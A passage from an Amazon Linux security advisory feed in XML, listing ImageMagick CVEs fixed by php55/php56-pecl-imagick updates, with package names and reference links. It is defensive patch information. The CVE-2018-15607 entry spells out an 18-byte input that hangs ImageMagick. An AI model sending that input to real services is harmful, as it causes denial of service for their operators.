title="" id="CVE-2019-10650" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-11470" title="" id="CVE-2019-11470" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-11472" title="" id="CVE-2019-11472" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-11597" 
title="" id="CVE-2019-11597" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-11598" title="" id="CVE-2019-11598" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-12974" title="" id="CVE-2019-12974" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-12975" title="" id="CVE-2019-12975" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-12976" title="" id="CVE-2019-12976" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-12978" title="" id="CVE-2019-12978" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-12979" title="" id="CVE-2019-12979" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13133" title="" id="CVE-2019-13133" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13134" title="" id="CVE-2019-13134" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13135" title="" id="CVE-2019-13135" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13295" title="" id="CVE-2019-13295" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13297" title="" id="CVE-2019-13297" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13300" title="" id="CVE-2019-13300" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13301" title="" id="CVE-2019-13301" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13304" title="" id="CVE-2019-13304" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13305" title="" id="CVE-2019-13305" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13306" title="" id="CVE-2019-13306" type="cve" /><reference 
href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13307" title="" id="CVE-2019-13307" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13309" title="" id="CVE-2019-13309" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13310" title="" id="CVE-2019-13310" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13311" title="" id="CVE-2019-13311" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13454" title="" id="CVE-2019-13454" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-14980" title="" id="CVE-2019-14980" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-14981" title="" id="CVE-2019-14981" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-15139" title="" id="CVE-2019-15139" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-15140" title="" id="CVE-2019-15140" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-15141" title="" id="CVE-2019-15141" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-16708" title="" id="CVE-2019-16708" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-16709" title="" id="CVE-2019-16709" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-16710" title="" id="CVE-2019-16710" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-16711" title="" id="CVE-2019-16711" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-16712" title="" id="CVE-2019-16712" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-16713" title="" id="CVE-2019-16713" type="cve" /><reference 
href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-17540" title="" id="CVE-2019-17540" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-17541" title="" id="CVE-2019-17541" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-19948" title="" id="CVE-2019-19948" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-19949" title="" id="CVE-2019-19949" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-7175" title="" id="CVE-2019-7175" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-7397" title="" id="CVE-2019-7397" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-7398" title="" id="CVE-2019-7398" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-9956" title="" id="CVE-2019-9956" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="php56-pecl-imagick" version="3.4.4" release="2.16.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-pecl-imagick-3.4.4-2.16.amzn1.x86_64.rpm</filename></package><package name="php56-pecl-imagick-debuginfo" version="3.4.4" release="2.16.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-pecl-imagick-debuginfo-3.4.4-2.16.amzn1.x86_64.rpm</filename></package><package name="php56-pecl-imagick-debuginfo" version="3.4.4" release="2.16.amzn1" epoch="0" arch="i686"><filename>Packages/php56-pecl-imagick-debuginfo-3.4.4-2.16.amzn1.i686.rpm</filename></package><package name="php56-pecl-imagick" version="3.4.4" release="2.16.amzn1" epoch="0" arch="i686"><filename>Packages/php56-pecl-imagick-3.4.4-2.16.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2023-1812</id><title>Amazon Linux AMI 
2014.03 - ALAS-2023-1812: medium priority package update for php55-pecl-imagick</title><issued date="2023-08-21 12:14:00" /><updated date="2023-08-23 02:32:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2019-9956:
In ImageMagick 7.0.8-35 Q16, there is a stack-based buffer overflow in the function PopHexPixel of coders/ps.c, which allows an attacker to cause a denial of service or code execution via a crafted image file.
CVE-2019-7398:
In ImageMagick before 7.0.8-25, a memory leak exists in WriteDIBImage in coders/dib.c.
CVE-2019-7397:
In ImageMagick before 7.0.8-25 and GraphicsMagick through 1.3.31, several memory leaks exist in WritePDFImage in coders/pdf.c.
CVE-2019-7175:
In ImageMagick before 7.0.8-25, some memory leaks exist in DecodeImage in coders/pcd.c.
CVE-2019-19949:
An out-of-bounds read was discovered in ImageMagick when writing PNG images. An attacker may abuse this flaw to trick a victim user into downloading a malicious image file and running it through ImageMagick, causing the application to crash.
CVE-2019-19948:
A heap-based buffer overflow flaw was discovered in ImageMagick when writing SGI images with improper columns and rows properties. An attacker may trick a victim user into downloading a malicious image file and running it through ImageMagick, possibly executing code on the victim user's system.
CVE-2019-17541:
ImageMagick before 7.0.8-55 has a use-after-free in DestroyStringInfo in MagickCore/string.c because the error manager is mishandled in coders/jpeg.c.
CVE-2019-17540:
ImageMagick before 7.0.8-54 has a heap-based buffer overflow in ReadPSInfo in coders/ps.c.
CVE-2019-16713:
ImageMagick 7.0.8-43 has a memory leak in coders/dot.c, as demonstrated by PingImage in MagickCore/constitute.c.
CVE-2019-16712:
ImageMagick 7.0.8-43 has a memory leak in Huffman2DEncodeImage in coders/ps3.c, as demonstrated by WritePS3Image.
CVE-2019-16711:
ImageMagick 7.0.8-40 has a memory leak in Huffman2DEncodeImage in coders/ps2.c.
CVE-2019-16710:
ImageMagick 7.0.8-35 has a memory leak in coders/dot.c, as demonstrated by AcquireMagickMemory in MagickCore/memory.c.
CVE-2019-16709:
ImageMagick 7.0.8-35 has a memory leak in coders/dps.c, as demonstrated by XCreateImage.
CVE-2019-16708:
ImageMagick 7.0.8-35 has a memory leak in magick/xwindow.c, related to XCreateImage.
CVE-2019-15141:
WriteTIFFImage in coders/tiff.c in ImageMagick 7.0.8-43 Q16 allows attackers to cause a denial-of-service (application crash resulting from a heap-based buffer over-read) via a crafted TIFF image file, related to TIFFRewriteDirectory, TIFFWriteDirectory, TIFFWriteDirectorySec, and TIFFWriteDirectoryTagColormap in tif_dirwrite.c of LibTIFF. NOTE: this occurs because of an incomplete fix for CVE-2019-11597.
CVE-2019-15140:
coders/mat.c in ImageMagick 7.0.8-43 Q16 allows remote attackers to cause a denial of service (use-after-free and application crash) or possibly have unspecified other impact by crafting a Matlab image file that is mishandled in ReadImage in MagickCore/constitute.c.
CVE-2019-15139:
The XWD image (X Window System window dumping file) parsing component in ImageMagick 7.0.8-41 Q16 allows attackers to cause a denial-of-service (application crash resulting from an out-of-bounds Read) in ReadXWDImage in coders/xwd.c by crafting a corrupted XWD image file, a different vulnerability than CVE-2019-11472.
CVE-2019-14981:
In ImageMagick 7.x before 7.0.8-41 and 6.x before 6.9.10-41, there is a divide-by-zero vulnerability in the MeanShiftImage function. It allows an attacker to cause a denial of service by sending a crafted file.
CVE-2019-14980:
In ImageMagick 7.x before 7.0.8-42 and 6.x before 6.9.10-42, there is a use after free vulnerability in the UnmapBlob function that allows an attacker to cause a denial of service by sending a crafted file.
CVE-2019-13454:
ImageMagick 7.0.8-54 Q16 allows Division by Zero in RemoveDuplicateLayers in MagickCore/layer.c.
CVE-2019-13311:
A flaw was found in ImageMagick, containing memory leaks of AcquireMagickMemory due to a wand/mogrify.c error. It was discovered that ImageMagick does not properly release acquired memory when some error conditions occur in the function MogrifyImageList(). An attacker could abuse this flaw by providing a specially crafted image and cause a Denial of Service by using all available memory. Applications compiled against ImageMagick libraries that accept untrustworthy images may be exploited to use all available memory and make them crash.
CVE-2019-13310:
A flaw was found in ImageMagick version 7.0.8-50 Q16, containing memory leaks of AcquireMagickMemory due to an error found in MagickWand/mogrify.c. It was discovered that ImageMagick does not properly release acquired memory when some error conditions occur in the function MogrifyImageList(). Applications compiled against ImageMagick libraries that accept untrustworthy images may be exploited to use all available memory and make them crash. An attacker could abuse this flaw by providing a specially crafted image and cause a Denial of Service by using all available memory.
CVE-2019-13309:
A flaw was found in ImageMagick version 7.0.8-50 Q16, containing memory leaks of AcquireMagickMemory due to the mishandling of the NoSuchImage error in CLIListOperatorImages in MagickWand/operation.c. It was discovered that ImageMagick does not properly release acquired memory in function MogrifyImageList() when some error conditions are met, or the "compare" option is used. Applications compiled against ImageMagick libraries that accept untrustworthy images may be exploited to use all available memory and make them crash. An attacker could abuse this flaw by providing a specially crafted image and cause a Denial of Service by using all available memory.
CVE-2019-13307:
A heap-based buffer overflow was discovered in ImageMagick in the way it parses images when using the evaluate-sequence option. Applications compiled against ImageMagick libraries that accept untrustworthy images and use the evaluate-sequence option or function EvaluateImages may be vulnerable to this flaw. An attacker could abuse this flaw by providing a specially crafted image to make the application crash or potentially execute code.
CVE-2019-13306:
A stack-based buffer overflow was discovered in ImageMagick in the way it writes PNM images due to off-by-one errors. Applications compiled against ImageMagick libraries that accept untrustworthy images or write PNM images may be vulnerable to this flaw. An attacker could abuse this flaw by providing a specially crafted image to make the application crash or potentially execute code.
CVE-2019-13305:
A stack-based buffer overflow was discovered in ImageMagick in the way it writes PNM images due to a misplaced strncpy and off-by-one errors. Applications compiled against ImageMagick libraries that accept untrustworthy images or write PNM images may be vulnerable to this flaw. An attacker could abuse this flaw by providing a specially crafted image to make the application crash or potentially execute code.
CVE-2019-13304:
A stack-based buffer overflow was discovered in ImageMagick in the way it writes PNM images due to a misplaced assignment. Applications compiled against ImageMagick libraries that accept untrustworthy images or write PNM images may be vulnerable to this flaw. An attacker could abuse this flaw by providing a specially crafted image to make the application crash or potentially execute code.
CVE-2019-13301:
ImageMagick 7.0.8-50 Q16 has memory leaks in AcquireMagickMemory because of an AnnotateImage error.
CVE-2019-13300:
A heap-based buffer overflow was discovered in ImageMagick in the way it applies a value with arithmetic, relational, or logical operators to an image due to mishandling columns. Applications compiled against ImageMagick libraries that accept untrustworthy images and use the evaluate-sequence option or function EvaluateImages may be vulnerable to this flaw. An attacker could abuse this flaw by providing a specially crafted image to make the application crash or potentially execute code.
CVE-2019-13297:
A heap-based buffer over-read was discovered in ImageMagick in the way it selects an individual threshold for each pixel based on the range of intensity values in its local neighborhood due to a height of zero mishandle error. Applications compiled against ImageMagick libraries that accept untrustworthy images may be vulnerable to this flaw. An attacker could abuse this flaw by providing a specially crafted image to make the application crash or leak application data.
CVE-2019-13295:
A heap-based buffer over-read was discovered in ImageMagick in the way it selects an individual threshold for each pixel based on the range of intensity values in its local neighborhood due to a width of zero mishandle error. Applications compiled against ImageMagick libraries that accept untrustworthy images may be vulnerable to this flaw. An attacker could abuse this flaw by providing a specially crafted image to make the application crash or leak application data.
CVE-2019-13135:
ImageMagick before 7.0.8-50 has a "use of uninitialized value" vulnerability in the function ReadCUTImage in coders/cut.c.
CVE-2019-13134:
ImageMagick before 7.0.8-50 has a memory leak vulnerability in the function ReadVIFFImage in coders/viff.c.
CVE-2019-13133:
ImageMagick before 7.0.8-50 has a memory leak vulnerability in the function ReadBMPImage in coders/bmp.c.
CVE-2019-12979:
ImageMagick 7.0.8-34 has a "use of uninitialized value" vulnerability in the SyncImageSettings function in MagickCore/image.c. This is related to AcquireImage in magick/image.c.
CVE-2019-12978:
ImageMagick 7.0.8-34 has a "use of uninitialized value" vulnerability in the ReadPANGOImage function in coders/pango.c.
CVE-2019-12976:
It was discovered that ImageMagick does not properly release acquired memory when some error conditions occur in the ReadPCLImage() function. Applications compiled against ImageMagick libraries that accept untrustworthy images may be exploited to use all available memory and make them crash. An attacker could abuse this flaw by providing a specially crafted image and cause a Denial of Service by using all available memory.
CVE-2019-12975:
It was discovered that ImageMagick does not properly release acquired memory when some error conditions occur in the WriteDPXImage() function. Applications compiled against ImageMagick libraries that accept untrustworthy images may be exploited to use all available memory and make them crash. An attacker could abuse this flaw by providing a specially crafted image and cause a denial of service by using all available memory.
CVE-2019-12974:
A NULL pointer dereference in the function ReadPANGOImage in coders/pango.c and the function ReadVIDImage in coders/vid.c in ImageMagick 7.0.8-34 allows remote attackers to cause a denial of service via a crafted image.
CVE-2019-11598:
In ImageMagick 7.0.8-40 Q16, there is a heap-based buffer over-read in the function WritePNMImage of coders/pnm.c, which allows an attacker to cause a denial of service or possibly information disclosure via a crafted image file. This is related to SetGrayscaleImage in MagickCore/quantize.c.
CVE-2019-11597:
In ImageMagick 7.0.8-43 Q16, there is a heap-based buffer over-read in the function WriteTIFFImage of coders/tiff.c, which allows an attacker to cause a denial of service or possibly information disclosure via a crafted image file.
CVE-2019-11472:
ReadXWDImage in coders/xwd.c in the XWD image parsing component of ImageMagick 7.0.8-41 Q16 allows attackers to cause a denial-of-service (divide-by-zero error) by crafting an XWD image file in which the header indicates neither LSB first nor MSB first.
CVE-2019-11470:
The cineon parsing component in ImageMagick 7.0.8-26 Q16 allows attackers to cause a denial-of-service (uncontrolled resource consumption) by crafting a Cineon image with an incorrect claimed image size. This occurs because ReadCINImage in coders/cin.c lacks a check for insufficient image data in a file.
CVE-2019-10650:
In ImageMagick 7.0.8-36 Q16, there is a heap-based buffer over-read in the function WriteTIFFImage of coders/tiff.c, which allows an attacker to cause a denial of service or information disclosure via a crafted image file.
CVE-2019-10131:
An off-by-one read vulnerability was discovered in ImageMagick in the formatIPTCfromBuffer function in coders/meta.c. A local attacker may use this flaw to read beyond the end of the buffer or to crash the program.
CVE-2018-9133:
ImageMagick 7.0.7-26 Q16 has excessive iteration in the DecodeLabImage and EncodeLabImage functions (coders/tiff.c), which results in a hang (tens of minutes) with a tiny PoC file. Remote attackers could leverage this vulnerability to cause a denial of service via a crafted tiff file.
CVE-2018-8804:
WriteEPTImage in coders/ept.c in ImageMagick 7.0.7-25 Q16 allows remote attackers to cause a denial of service (MagickCore/memory.c double free and application crash) or possibly have unspecified other impact via a crafted file.
CVE-2018-20467:
In coders/bmp.c in ImageMagick before 7.0.8-16, an input file can result in an infinite loop and hang, with high CPU and memory consumption. Remote attackers could leverage this vulnerability to cause a denial of service via a crafted file.
CVE-2018-18544:
There is a memory leak in the function WriteMSLImage of coders/msl.c in ImageMagick 7.0.8-13 Q16, and the function ProcessMSLScript of coders/msl.c in GraphicsMagick before 1.3.31.
CVE-2018-16750:
In ImageMagick 7.0.7-29 and earlier, a memory leak in the formatIPTCfromBuffer function in coders/meta.c was found.
CVE-2018-16749:
In ImageMagick 7.0.7-29 and earlier, a missing NULL check in ReadOneJNGImage in coders/png.c allows an attacker to cause a denial of service (WriteBlob assertion failure and application exit) via a crafted file.
CVE-2018-16328:
In ImageMagick before 7.0.8-8, a NULL pointer dereference exists in the CheckEventLogging function in MagickCore/log.c.
CVE-2018-15607:
In ImageMagick 7.0.8-11 Q16, a tiny input file 0x50 0x36 0x36 0x36 0x36 0x4c 0x36 0x38 0x36 0x36 0x36 0x36 0x36 0x36 0x1f 0x35 0x50 0x00 can result in a hang of several minutes during which CPU and memory resources are consumed until ultimately an attempted large memory allocation fails. Remote attackers could leverage this vulnerability to cause a denial of service via a crafted file.
CVE-2018-14437:
ImageMagick 7.0.8-4 has a memory leak in parse8BIM in coders/meta.c.
CVE-2018-14436:
ImageMagick 7.0.8-4 has a memory leak in ReadMIFFImage in coders/miff.c.
CVE-2018-14435:
ImageMagick 7.0.8-4 has a memory leak in DecodeImage in coders/pcd.c.
CVE-2018-14434:
ImageMagick 7.0.8-4 has a memory leak for a colormap in WriteMPCImage in coders/mpc.c.
CVE-2018-13153:
A memory leak was discovered in ImageMagick in the XMagickCommand function in animate.c file. An array of strings, named filelist, is allocated on the heap but not released in case the function ExpandFilenames returns an error code.
CVE-2018-12600:
In ImageMagick 7.0.8-3 Q16, ReadDIBImage and WriteDIBImage in coders/dib.c allow attackers to cause an out of bounds write via a crafted file.
CVE-2018-12599:
In ImageMagick 7.0.8-3 Q16, ReadBMPImage and WriteBMPImage in coders/bmp.c allow attackers to cause an out of bounds write via a crafted file.
CVE-2018-11656:
In ImageMagick 7.0.7-20 Q16 x86_64, a memory leak vulnerability was found in the function ReadDCMImage in coders/dcm.c, which allows attackers to cause a denial of service via a crafted DCM image file.
CVE-2018-10805:
ImageMagick version 7.0.7-28 contains a memory leak in ReadYCBCRImage in coders/ycbcr.c.
CVE-2018-10804:
ImageMagick version 7.0.7-28 contains a memory leak in WriteTIFFImage in coders/tiff.c.
CVE-2018-10177:
An infinite loop has been found in the way ImageMagick reads Multiple-image Network Graphics (MNG) data. An attacker could exploit this to cause a denial of service via a crafted MNG file.
CVE-2017-18273:
In ImageMagick 7.0.7-16 Q16 x86_64 2017-12-22, an infinite loop vulnerability was found in the function ReadTXTImage in coders/txt.c, which allows attackers to cause a denial of service (CPU exhaustion) via a crafted image file that is mishandled in a GetImageIndexInList call.
CVE-2017-18271:
In ImageMagick 7.0.7-16 Q16 x86_64 2017-12-22, an infinite loop vulnerability was found in the function ReadMIFFImage in coders/miff.c, which allows attackers to cause a denial of service (CPU exhaustion) via a crafted MIFF image file.
CVE-2017-18254:
A memory leak vulnerability has been discovered in ImageMagick in the WriteGIFImage function of coders/gif.c file. An attacker could use this flaw to cause a denial of service via a crafted file.
CVE-2017-18252:
An issue was discovered in ImageMagick 7.0.7. The MogrifyImageList function in MagickWand/mogrify.c allows attackers to cause a denial of service (assertion failure and application exit in ReplaceImageInList) via a crafted file.
CVE-2017-18251:
A memory leak vulnerability has been discovered in ImageMagick in the ReadPCDImage function of coders/pcd.c file. An attacker could use this flaw to cause a denial of service via a crafted file.
CVE-2017-12806:
In ImageMagick 7.0.6-6, a memory exhaustion vulnerability was found in the function format8BIM, which allows attackers to cause a denial of service.
CVE-2017-12805:
In ImageMagick 7.0.6-6, a memory exhaustion vulnerability was found in the function ReadTIFFImage, which allows attackers to cause a denial of service.
CVE-2017-11166:
The ReadXWDImage function in coders/xwd.c in ImageMagick 7.0.5-6 has a memory leak vulnerability that can cause memory exhaustion via a crafted length (number of color-map entries) field in the header of an XWD file.
CVE-2017-1000476:
In ImageMagick 7.0.7-12 Q16, a CPU exhaustion vulnerability was found in the function ReadDDSInfo in coders/dds.c, which allows attackers to cause a denial of service.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-1000476" title="" id="CVE-2017-1000476" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-11166" title="" id="CVE-2017-11166" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-12805" title="" id="CVE-2017-12805" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-12806" title="" id="CVE-2017-12806" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-18251" title="" id="CVE-2017-18251" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-18252" title="" id="CVE-2017-18252" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-18254" title="" id="CVE-2017-18254" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-18271" title="" id="CVE-2017-18271" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-18273" title="" id="CVE-2017-18273" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-10177" title="" id="CVE-2018-10177" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-10804" title="" id="CVE-2018-10804" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-10805" title="" id="CVE-2018-10805" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-11656" title="" id="CVE-2018-11656" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-12599" title="" id="CVE-2018-12599" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-12600" title="" id="CVE-2018-12600" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-13153" title="" id="CVE-2018-13153" type="cve" /><reference 
href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-14434" title="" id="CVE-2018-14434" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-14435" title="" id="CVE-2018-14435" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-14436" title="" id="CVE-2018-14436" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-14437" title="" id="CVE-2018-14437" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-15607" title="" id="CVE-2018-15607" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-16328" title="" id="CVE-2018-16328" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-16749" title="" id="CVE-2018-16749" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-16750" title="" id="CVE-2018-16750" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-18544" title="" id="CVE-2018-18544" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-20467" title="" id="CVE-2018-20467" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-8804" title="" id="CVE-2018-8804" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-9133" title="" id="CVE-2018-9133" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-10131" title="" id="CVE-2019-10131" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-10650" title="" id="CVE-2019-10650" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-11470" title="" id="CVE-2019-11470" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-11472" title="" id="CVE-2019-11472" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-11597" 
title="" id="CVE-2019-11597" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-11598" title="" id="CVE-2019-11598" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-12974" title="" id="CVE-2019-12974" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-12975" title="" id="CVE-2019-12975" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-12976" title="" id="CVE-2019-12976" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-12978" title="" id="CVE-2019-12978" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-12979" title="" id="CVE-2019-12979" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13133" title="" id="CVE-2019-13133" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13134" title="" id="CVE-2019-13134" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13135" title="" id="CVE-2019-13135" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13295" title="" id="CVE-2019-13295" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13297" title="" id="CVE-2019-13297" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13300" title="" id="CVE-2019-13300" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13301" title="" id="CVE-2019-13301" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13304" title="" id="CVE-2019-13304" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13305" title="" id="CVE-2019-13305" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13306" title="" id="CVE-2019-13306" type="cve" /><reference 
href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13307" title="" id="CVE-2019-13307" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13309" title="" id="CVE-2019-13309" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13310" title="" id="CVE-2019-13310" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13311" title="" id="CVE-2019-13311" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13454" title="" id="CVE-2019-13454" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-14980" title="" id="CVE-2019-14980" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-14981" title="" id="CVE-2019-14981" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-15139" title="" id="CVE-2019-15139" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-15140" title="" id="CVE-2019-15140" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-15141" title="" id="CVE-2019-15141" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-16708" title="" id="CVE-2019-16708" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-16709" title="" id="CVE-2019-16709" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-16710" title="" id="CVE-2019-16710" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-16711" title="" id="CVE-2019-16711" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-16712" title="" id="CVE-2019-16712" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-16713" title="" id="CVE-2019-16713" type="cve" /><reference 
